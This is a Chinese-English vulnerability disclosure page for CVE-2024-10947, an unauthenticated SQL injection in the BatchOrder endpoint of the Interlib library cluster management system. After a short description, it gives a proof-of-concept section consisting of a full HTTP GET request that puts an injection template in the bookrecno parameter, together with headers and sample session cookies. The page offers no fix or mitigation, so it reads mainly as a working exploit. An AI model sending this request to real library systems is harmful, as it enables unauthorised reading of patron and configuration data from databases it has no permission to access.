【原创】(CVE-2024-10947)广州图创计算机软件开发有限公司 图书馆集群管理系统(Interlib) <=V 2.0.1 BatchOrder SQL注入漏洞
当前为私密分享,无需登录即可查看。
时间 |
---|
2024-10-28 15:40:35 |
CVE-2024-10947
Created: 11/06/2024 09:36 PM
Updated: 11/07/2024 01:31 PM
Changes: 11/06/2024 09:36 PM (57), 11/07/2024 10:13 AM (30), 11/07/2024 01:31 PM (1)
Submitter: 高小白@wiki
漏洞描述
广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。
- Guangzhou Tuchuang Computer Software Development Co., Ltd. is a high-tech enterprise that integrates product research and development, application integration, and customer service. Its main goal is to provide high-quality application software system design, integration, and maintenance services to users in the library industry.
Interlib 图书馆集群自动化管理系统 V2.0.1(简称 “Interlib V2.0.1”)中的/interlib/order/BatchOrder
模块存在 SQL 注入漏洞。由于该模块未对用户输入的 SQL 语句进行适当的过滤或验证,导致攻击者可以构造恶意的 SQL 语句,从而执行未授权的数据库查询。未经身份验证的攻击者可以利用此漏洞获取数据库中的敏感信息,例如图书馆的配置信息、用户数据等。
- The /interlib/order/BatchOrder module in the Interlib Library Cluster Automation Management System V2.0.1 (referred to as "Interlib V2.0.1") contains a SQL injection vulnerability. Due to the module's failure to properly filter or validate user input SQL statements, attackers can construct malicious SQL statements to execute unauthorized database queries. Unauthenticated attackers can exploit this vulnerability to access sensitive information in the database, such as library configuration information and user data.
POC
GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=-1<Encode> and#inject#--</Encode> HTTP/1.1
Host: target-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=9EFCA7209FCB0D1C3B8866575F370B38; loginid="ikj3/fdi/YQ="; JSESSIONID=50BA98F89EB38EF3B7A363EEFA31A4F3; isHaveAsk=false
Connection: close